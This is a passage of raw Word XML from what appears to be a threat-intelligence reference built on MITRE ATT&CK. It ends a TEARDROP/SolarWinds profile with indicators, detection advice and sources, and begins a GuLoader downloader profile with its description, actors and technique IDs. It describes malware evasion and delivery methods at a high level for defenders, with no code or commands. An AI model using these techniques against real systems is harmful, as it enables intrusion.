                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Enabled stealthy second-stage compromise, prolonged attacker persistence, defense evasion, and espionage activities during the SolarWinds campaign.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="5EC46FF5" w14:textId="77777777" w:rsidTr="00175DEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70945040" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Indicators of Compromise (IOCs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04D79D91" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Suspicious Windows services, binaries masquerading as legitimate files, fake JPG headers, XOR-decoded payloads, abnormal registry modifications, and suspicious files in C:\Windows\SysWOW64\.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="79A0F3E5" w14:textId="77777777" w:rsidTr="00175DEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3107F142" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Detection &amp; Mitigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18BF2FFE" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Use EDR monitoring, service creation logging, registry auditing, behavioral analytics, YARA rules, least privilege enforcement, application control, network segmentation, and threat hunting based on ATT&amp;CK TTPs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="61502C18" w14:textId="77777777" w:rsidTr="00175DEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EB9831E" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>References &amp; Sources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DE7D12B" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. </w:t>
            </w:r>
            <w:hyperlink r:id="rId20" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="18"/>
                </w:rPr>
                <w:t>MITRE ATT&amp;CK TEARDROP S0560</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2. </w:t>
            </w:r>
            <w:hyperlink r:id="rId21" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="18"/>
                </w:rPr>
                <w:t>MITRE ATT&amp;CK Software Catalog</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3. </w:t>
            </w:r>
            <w:hyperlink r:id="rId22" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="18"/>
                </w:rPr>
                <w:t>MITRE ATT&amp;CK Framework</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 4. FireEye SolarWinds Investigation 5. Microsoft MSTIC </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Solorigate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6BF17B61" w14:textId="57E5B87C" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="745C8415" w14:textId="1F9608D1" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Guloader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="009B4494" w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>S0561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8952"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="6B364CD8" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FA2CC10" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="437B45EC" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="481939E6" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D2ED9B4" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Name &amp; Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2962A323" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>GuLoader (S0561)</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Malware / Downloader / Loader</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="05B62EC7" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0ACF11A3" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44E44EF7" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>GuLoader is a cloud-based malware downloader primarily used to deliver additional malware payloads such as RATs, banking trojans, stealers, and ransomware. It is known for using cloud hosting services (e.g., Google Drive, OneDrive, Dropbox) to evade detection and dynamically retrieve encrypted payloads directly into memory.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="51484079" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="392D41FD" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Threat Actor Association</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18495B82" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">Multiple financially motivated cybercriminal groups; commonly used in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>MaaS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Malware-as-a-Service) campaigns.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="222EA79F" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BDE4F47" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Supported Platforms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A943127" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="04CD7E6F" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72E13B60" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>ATT&amp;CK Techniques Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45AFD00E" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1105</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Ingress Tool Transfer </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1027</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Obfuscated Files or Information </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1140</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Deobfuscate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">/Decode Files or Information </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1218</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Signed Binary Proxy Execution </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1566.001</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Phishing: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Spearphishing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> Attachment </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1055</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Process Injection </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1620</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Reflective Code Loading </w:t>
            </w:r>
